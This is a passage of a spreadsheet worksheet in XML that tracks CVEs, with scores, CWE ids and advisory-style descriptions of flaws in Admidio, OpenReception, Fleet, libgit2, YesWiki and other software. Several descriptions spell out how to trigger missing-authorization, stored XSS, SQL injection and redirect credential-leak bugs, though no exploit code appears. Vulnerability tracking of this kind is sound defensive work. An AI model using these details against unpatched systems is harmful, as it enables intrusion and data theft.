      <c r="E3865" s="5" t="inlineStr"/>
      <c r="F3865" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3865" s="5" t="inlineStr"/>
      <c r="H3865" s="5" t="inlineStr"/>
      <c r="I3865" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3865" s="5" t="inlineStr"/>
      <c r="K3865" s="5" t="inlineStr">
        <is>
          <t>CWE-1281, CWE-862</t>
        </is>
      </c>
      <c r="L3865" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. Version 5.0.9 added a missing `isAdministratorInventory()` gate to `case 'item_delete':` in `modules/inventory.php`. The same fix was not applied to the sibling `case 'field_delete':` handler, which destroys an entire inventory field definition, cascading to every `adm_inventory_item_data` row that referenced that field and every `adm_inventory_field_options` entry. The handler validates only a session-bound CSRF token; there is no `isAdministratorInventory()` check at the controller level, and `Admidio\Inventory\Entity\ItemField::delete()` does not enforce one at the entity level either (unlike its sibling `ItemField::save()`, which does check `$gCurrentUser-&gt;isAdministrator()`). Any user who can log in to the site can permanently destroy a non-system inventory field by sending one POST. Version 5.0.10 provides an updated fix.</t>
        </is>
      </c>
      <c r="M3865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47233</t>
        </is>
      </c>
    </row>
    <row r="3866">
      <c r="A3866" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48075</t>
        </is>
      </c>
      <c r="C3866" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3866" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3866" s="5" t="inlineStr"/>
      <c r="F3866" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3866" s="5" t="inlineStr"/>
      <c r="H3866" s="5" t="inlineStr"/>
      <c r="I3866" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J3866" s="5" t="inlineStr"/>
      <c r="K3866" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3866" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.5, the `add-to-tunnel` endpoint creates a new appointment row in any client tunnel without any caller authentication. A request that supplies any valid `tunnelId` and any valid `emailHash` (the two need not belong to the same tunnel) results in an inserted appointment with `status = "CONFIRMED"`, attacker-controlled ciphertext fields, attacker-controlled date and duration, and an attacker-chosen agent. The endpoint validates only that some tunnel exists with the given `emailHash`, then writes the appointment using the attacker-supplied `tunnelId` directly. The `emailHash` lookup is effectively an existence check on the tenant; it does not authenticate the caller as the owner of the supplied `tunnelId`. Combined with the absence of any session, Authorization header, booking access token, or PoW, this makes the endpoint accept arbitrary appointment writes into arbitrary tunnels. By contrast, the sibling endpoint `create-new-client` (used to bootstrap a brand-new client tunnel) requires a Bearer bootstrap booking access token issued by the bootstrap-challenge / bootstrap-verify flow. The `add-to-tunnel` endpoint, intended for return-clients booking additional appointments, has no equivalent gate. The application's own middleware confirms this is intentional: `add-to-tunnel` is explicitly listed in the apiAuthHandle public-route allowlist alongside the bootstrap and challenge endpoints (which legitimately have no session). Version 1.0.5 fixes the issue.</t>
        </is>
      </c>
      <c r="M3866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48075</t>
        </is>
      </c>
    </row>
    <row r="3867">
      <c r="A3867" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48076</t>
        </is>
      </c>
      <c r="C3867" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3867" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3867" s="5" t="inlineStr"/>
      <c r="F3867" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3867" s="5" t="inlineStr"/>
      <c r="H3867" s="5" t="inlineStr"/>
      <c r="I3867" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J3867" s="5" t="inlineStr"/>
      <c r="K3867" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3867" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. The new-client booking flow in versions 1.0.1 and prior consists of three calls: `bootstrap-challenge` (returns a 16-bit PoW challenge with `difficulty=4` leading hex zeroes), `bootstrap-verify` (validates the PoW and issues a Bearer booking access token), and `create-new-client` (consumes the token and creates the tunnel and first appointment). The token correctly binds to `tenantId`, `tunnelId`, `clientPublicKey`, and `emailHash`, but never to `channelId`. The `bootstrap-challenge` request schema does not even accept a `channelId`, and the issued token's payload contains no channel information. Independently, the service function `createNewClientWithAppointment` checks only `channel.archived = false`. The `channel.isPublic` check that protects `addAppointmentToTunnel` is missing in the new-client path. The combination means: an attacker completes the bootstrap flow normally (16-bit PoW, completes in well under one second on commodity hardware, no rate limiting beyond the throttle store), receives a valid booking access token, and then submits the `create-new-client` payload with `channelId` pointing to a private (`isPublic = false`) channel. The booking lands as `CONFIRMED` if the target channel has `requiresConfirmation = false` (the default), otherwise as `NEW`. The patient-facing UI does not list private channels in its picker (`/api/public/channels` correctly filters `isPublic = true`), so the channel ID must be obtained out of band. The companion finding V-10 (schedule endpoint discloses private channels) provides exactly that: a single unauthenticated GET reveals every private channel ID for any tenant. V-10 plus V-11 together make private channels fully reachable to anonymous attackers. As of time of publication, no known patched versions are available.</t>
        </is>
      </c>
      <c r="M3867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48076</t>
        </is>
      </c>
    </row>
    <row r="3868">
      <c r="A3868" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48083</t>
        </is>
      </c>
      <c r="C3868" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3868" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3868" s="5" t="inlineStr"/>
      <c r="F3868" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3868" s="5" t="inlineStr"/>
      <c r="H3868" s="5" t="inlineStr"/>
      <c r="I3868" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J3868" s="5" t="inlineStr"/>
      <c r="K3868" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="L3868" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, the `/api/log` endpoint accepts unauthenticated POST requests, applies no schema validation to the message body, writes attacker-controlled content directly into the application's stdout log, interprets newline characters as real line breaks, and enforces no size or rate limits. Three independent abuse modes follow: log injection (forge log lines that look like legitimate system events), log volume DoS (saturate the logging pipeline at sustained 100+ requests per second of small messages), and oversized-payload submission (100 KB payloads accepted; larger sizes not tested). The most operationally damaging mode is log injection. An attacker can inject lines that an operator scanning logs would mistake for real system errors, mask their own activity behind fake noise, or pollute SIEM alerting rules with crafted false positives. A line such as `[error]: injected admin error` injected from an unauthenticated source is indistinguishable from the application's own error output once written to disk. Version 1.0.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M3868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48083</t>
        </is>
      </c>
    </row>
    <row r="3869">
      <c r="A3869" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48093</t>
        </is>
      </c>
      <c r="C3869" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3869" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3869" s="5" t="inlineStr"/>
      <c r="F3869" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3869" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3869" s="5" t="inlineStr"/>
      <c r="I3869" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3869" s="5" t="inlineStr"/>
      <c r="K3869" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3869" s="5" t="inlineStr">
        <is>
          <t>The Code Embed WordPress plugin prior to version 2.6.1 is vulnerable to stored Cross-Site Scripting (XSS) through the external URL embed feature in post content. The vulnerable code scans rendered content for URL embed tokens, fetches the remote URL, and inserts the remote response body into the page without output sanitization or an `unfiltered_html` capability check. This allows a Contributor attacker to submit a pending post containing an inert-looking URL token that executes attacker-controlled JavaScript when an Administrator or Editor previews or reviews the post. This is distinct from CVE-2026-2512, which affected custom field meta values up to version 2.5.1. This vector affects version 2.6 and uses the documented external URL embed feature in post content. This particular issue is patched in version 2.6.1.</t>
        </is>
      </c>
      <c r="M3869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48093</t>
        </is>
      </c>
    </row>
    <row r="3870">
      <c r="A3870" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48786</t>
        </is>
      </c>
      <c r="C3870" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3870" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3870" s="5" t="inlineStr"/>
      <c r="F3870" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3870" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H3870" s="5" t="inlineStr"/>
      <c r="I3870" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3870" s="5" t="inlineStr"/>
      <c r="K3870" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3870" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions prior to 4.87.0, the target search endpoint (POST /api/latest/fleet/targets) returned unmasked team enroll secrets and full team configuration, including credential-bearing agent options, to low-privilege observer-class users. Other team-facing endpoints mask these fields for observers, but the target search endpoint did not apply the same sanitization, so an authenticated user with the Observer, Observer+, or Technician role, whether global or team-scoped, could retrieve the secrets and agent options by performing a target search against an observer-runnable query. With a leaked team enroll secret an attacker could enroll unauthorized hosts into the affected team, and if the team's agent options contained credentials such as AWS secret access keys or proxy passwords, those values were disclosed as well. This issue is fixed in version 4.87.0.</t>
        </is>
      </c>
      <c r="M3870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48786</t>
        </is>
      </c>
    </row>
    <row r="3871">
      <c r="A3871" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49455</t>
        </is>
      </c>
      <c r="C3871" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3871" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3871" s="5" t="inlineStr"/>
      <c r="F3871" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3871" s="5" t="inlineStr"/>
      <c r="H3871" s="5" t="inlineStr"/>
      <c r="I3871" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3871" s="5" t="inlineStr"/>
      <c r="K3871" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3871" s="5" t="inlineStr">
        <is>
          <t>Waku is the minimal React framework. Prior to version 1.0.0-beta.1, Waku's RSC request dispatcher invokes server actions without validating the request's Origin (or Sec-Fetch-Site) header. A cross-origin web attacker can therefore cause a victim browser to issue an authenticated POST to a registered server action endpoint using a CORS-safelisted content type (text/plain), which does not trigger a preflight. Any state-mutating server action that the application exposes via 'use server' can be invoked with the victim's cookies attached. This issue has been patched in version 1.0.0-beta.1.</t>
        </is>
      </c>
      <c r="M3871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49455</t>
        </is>
      </c>
    </row>
    <row r="3872">
      <c r="A3872" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49466</t>
        </is>
      </c>
      <c r="C3872" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3872" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3872" s="5" t="inlineStr"/>
      <c r="F3872" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3872" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3872" s="5" t="inlineStr"/>
      <c r="I3872" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3872" s="5" t="inlineStr"/>
      <c r="K3872" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3872" s="5" t="inlineStr">
        <is>
          <t>Draft List is a WordPress plugin to manage and promote unpublished content. Versions 2.6.3 and below are vulnerable to stored Cross-Site Scripting (XSS) in the `[drafts]` shortcode and Draft List widget when the documented custom `template` option places the `{{draft}}` placeholder inside an HTML attribute. The vulnerable code inserts the raw draft `post_title` into `{{draft}}` when the current viewer cannot edit posts. Because the template is sanitized before `{{draft}}` replacement, a Contributor can store a quote-only title payload that breaks out of an attribute in a site-configured Draft List template and executes JavaScript for visitors who load the public page. Version 2.6.4 fixes the issue.</t>
        </is>
      </c>
      <c r="M3872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49466</t>
        </is>
      </c>
    </row>
    <row r="3873">
      <c r="A3873" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49976</t>
        </is>
      </c>
      <c r="C3873" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3873" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3873" s="5" t="inlineStr"/>
      <c r="F3873" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3873" s="5" t="inlineStr"/>
      <c r="H3873" s="5" t="inlineStr"/>
      <c r="I3873" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3873" s="5" t="inlineStr"/>
      <c r="K3873" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3873" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.6.1, a user with the import permission can use CSV update mode to overwrite the email address of a non-admin user and then request a password reset to take over that account. app/Importer/UserImporter.php applies the canEditAuthFields gate by unsetting username, email, password, and activated on the model, but app/Importer/ItemImporter.php sanitizeItemForUpdating() rebuilds the update array from the raw CSV row in $this-&gt;item, restoring the unauthorized values. The app/Http/Controllers/ImportController.php import path checks import permission but does not require users.edit. This issue is fixed in version 8.6.1.</t>
        </is>
      </c>
      <c r="M3873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49976</t>
        </is>
      </c>
    </row>
    <row r="3874">
      <c r="A3874" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52371</t>
        </is>
      </c>
      <c r="C3874" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3874" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3874" s="5" t="inlineStr"/>
      <c r="F3874" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3874" s="5" t="inlineStr"/>
      <c r="H3874" s="5" t="inlineStr"/>
      <c r="I3874" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J3874" s="5" t="inlineStr"/>
      <c r="K3874" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3874" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) in the xxl-job-admin/jobinfo/trigger component of xxl-job v3.4.0 allows authenticated attackers to scan resources via supplying a crafted HTTP request.</t>
        </is>
      </c>
      <c r="M3874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52371</t>
        </is>
      </c>
    </row>
    <row r="3875">
      <c r="A3875" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52731</t>
        </is>
      </c>
      <c r="C3875" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3875" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3875" s="5" t="inlineStr"/>
      <c r="F3875" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3875" s="5" t="inlineStr"/>
      <c r="H3875" s="5" t="inlineStr"/>
      <c r="I3875" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3875" s="5" t="inlineStr"/>
      <c r="K3875" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L3875" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, an attacker authenticated to an enabled Zebra RPC endpoint can terminate zebrad by supplying a getblocktemplate LongPollId containing multi-byte UTF-8 characters. In zebra-rpc/src/methods/types/long_poll.rs, LongPollId::from_str originally checked the input byte length and then sliced fixed byte ranges to parse encoded fields. A slice boundary can land inside a multi-byte character and trigger Rust's byte index is not a char boundary panic. Zebra release builds use panic equals abort, so one malformed authenticated RPC request terminates the entire node process and can be repeated after restart. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M3875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52731</t>
        </is>
      </c>
    </row>
    <row r="3876">
      <c r="A3876" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52733</t>
        </is>
      </c>
      <c r="C3876" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3876" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3876" s="5" t="inlineStr"/>
      <c r="F3876" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3876" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H3876" s="5" t="inlineStr"/>
      <c r="I3876" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3876" s="5" t="inlineStr"/>
      <c r="K3876" s="5" t="inlineStr">
        <is>
          <t>CWE-459, CWE-672</t>
        </is>
      </c>
      <c r="L3876" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, a natural or attacker-influenced chain fork can leave stale Sapling and Orchard note-commitment subtree roots in Zebra state. In zebra-state/src/service/non_finalized_state/chain.rs, Chain::pop_tip removed a reverted tip block but did not remove subtree entries whose end_height belonged to that block, unlike the cleanup performed by pop_root. When the winning fork later finalized, the abandoned branch's stale subtree data could be written to RocksDB and survive node restarts. The corrupted history can cause z_getsubtreesbyindex consumers such as lightwalletd and light wallets to receive incorrect subtree roots, producing wallet synchronization failures or incorrect wallet state and requiring a full state rebuild for recovery. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M3876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52733</t>
        </is>
      </c>
    </row>
    <row r="3877">
      <c r="A3877" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52763</t>
        </is>
      </c>
      <c r="C3877" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3877" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3877" s="5" t="inlineStr"/>
      <c r="F3877" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3877" s="5" t="inlineStr"/>
      <c r="H3877" s="5" t="inlineStr"/>
      <c r="I3877" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3877" s="5" t="inlineStr"/>
      <c r="K3877" s="5" t="inlineStr">
        <is>
          <t>CWE-1287, CWE-89</t>
        </is>
      </c>
      <c r="L3877" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, the recentchanges action (actions/recentchanges.php) accepts a period argument from two disjoint parameter spaces. A whitelist validates only the URL form against ['day','week','month']. The action-argument form takes the else branch with no validation, and the value flows into PageManager::getRecentlyChanged(), where it is interpolated into a WHERE time &gt;= '...' ORDER BY time DESC clause without escaping or parameterization. UNION-based injection succeeds, the leaked rows render into the response page, so any visitor of the trigger page sees the exfiltrated data. The vulnerability provides arbitrary read of the YesWiki database to anyone who can save the trigger page. On a default install (default_write_acl='*'), this includes anonymous users, subject to the hashcash JS check on the page-edit form. Once the trigger page is saved, every subsequent view fires the injection as the SQLi is stored. Stored SQL injection is reachable through the page-edit flow, with arbitrary database read. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M3877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52763</t>
        </is>
      </c>
    </row>
    <row r="3878">
      <c r="A3878" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53524</t>
        </is>
      </c>
      <c r="C3878" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3878" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3878" s="5" t="inlineStr"/>
      <c r="F3878" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3878" s="5" t="inlineStr"/>
      <c r="H3878" s="5" t="inlineStr"/>
      <c r="I3878" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J3878" s="5" t="inlineStr"/>
      <c r="K3878" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L3878" s="5" t="inlineStr">
        <is>
          <t>WeeChat (Wee Enhanced Environment for Chat) is a free chat client. In versions 4.3.0 through 4.9.0, the WeeChat relay module's WebSocket permessage-deflate decompression function relay_websocket_inflate() has no upper bound on output size. An authenticated relay user can send a small compressed WebSocket frame (~100 bytes) that decompresses to gigabytes, exhausting all server memory and crashing the entire WeeChat process. The api protocol enables permessage-deflate and requires authentication before WebSocket upgrade. Version 4.9.1 patches the issue.</t>
        </is>
      </c>
      <c r="M3878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53524</t>
        </is>
      </c>
    </row>
    <row r="3879">
      <c r="A3879" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53583</t>
        </is>
      </c>
      <c r="C3879" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3879" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3879" s="5" t="inlineStr"/>
      <c r="F3879" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3879" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H3879" s="5" t="inlineStr"/>
      <c r="I3879" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3879" s="5" t="inlineStr"/>
      <c r="K3879" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297</t>
        </is>
      </c>
      <c r="L3879" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, verify_server_cert in src/libgit2/streams/openssl.c uses an inverted !!memcmp result in the GEN_IPADD branch when comparing an IP-literal host with a certificate IP SubjectAltName. OpenSSL builds reject matching IP addresses and accept mismatched IP addresses, allowing a network attacker with a CA-trusted certificate containing any IP SubjectAltName to intercept libgit2 connections to IP-literal HTTPS URLs. DNS SubjectAltName validation and non-OpenSSL TLS backends are not affected. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="M3879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53583</t>
        </is>
      </c>
    </row>
    <row r="3880">
      <c r="A3880" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53586</t>
        </is>
      </c>
      <c r="C3880" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3880" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3880" s="5" t="inlineStr"/>
      <c r="F3880" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3880" s="5" t="inlineStr"/>
      <c r="H3880" s="5" t="inlineStr"/>
      <c r="I3880" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3880" s="5" t="inlineStr"/>
      <c r="K3880" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-601</t>
        </is>
      </c>
      <c r="L3880" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, the built-in HTTP transport in src/libgit2/transports/http.c follows an offsite initial redirect, and handle_remote_auth and handle_auth pass transport-&gt;owner-&gt;url instead of transport-&gt;server.url to the credential callback when the redirected host returns 401 Unauthorized. A callback that scopes credentials to the original trusted URL can therefore return GIT_CREDENTIAL_USERPASS_PLAINTEXT credentials that libgit2 stores in transport-&gt;server.cred and sends as an Authorization header to the redirected host. An attacker who controls a trusted Git host or an open redirect on that host can disclose HTTP Basic credentials, personal access tokens, or equivalent credentials. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="M3880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53586</t>
        </is>
      </c>
    </row>
    <row r="3881">
      <c r="A3881" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53637</t>
        </is>
      </c>
      <c r="C3881" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3881" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3881" s="5" t="inlineStr"/>
      <c r="F3881" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3881" s="5" t="inlineStr"/>
      <c r="H3881" s="5" t="inlineStr"/>
      <c r="I3881" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3881" s="5" t="inlineStr"/>
      <c r="K3881" s="5" t="inlineStr">
        <is>
          <t>CWE-672, CWE-841</t>
        </is>
      </c>
      <c r="L3881" s="5" t="inlineStr">
        <is>
          <t>Sylius is an Open Source eCommerce Framework on Symfony. Versions 2.0.0 through 2.0.17, 2.1.0 through 2.1.14, and 2.2.0 through 2.2.5 contain an improper workflow enforcement vulnerability in the cart `FormComponent`. When an order is completed while its cart page remains open, the stale LiveComponent does not detect the order’s changed state and continues to permit cart actions, allowing an authenticated customer to modify or permanently delete an already completed order. Versions 2.0.18, 2.1.15, and 2.2.6 contain a patch. As a workaround, deployments can copy the patched `FormComponent` into the application's `src/` directory and override the `sylius_shop.twig.component.cart.form` service definition to use that class.</t>
        </is>
      </c>
      <c r="M3881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53637</t>
        </is>
      </c>
    </row>
    <row r="3882">
      <c r="A3882" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53769</t>
        </is>
      </c>
      <c r="C3882" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3882" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3882" s="5" t="inlineStr"/>
      <c r="F3882" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3882" s="5" t="inlineStr"/>
      <c r="H3882" s="5" t="inlineStr"/>
      <c r="I3882" s="5" t="inlineStr">
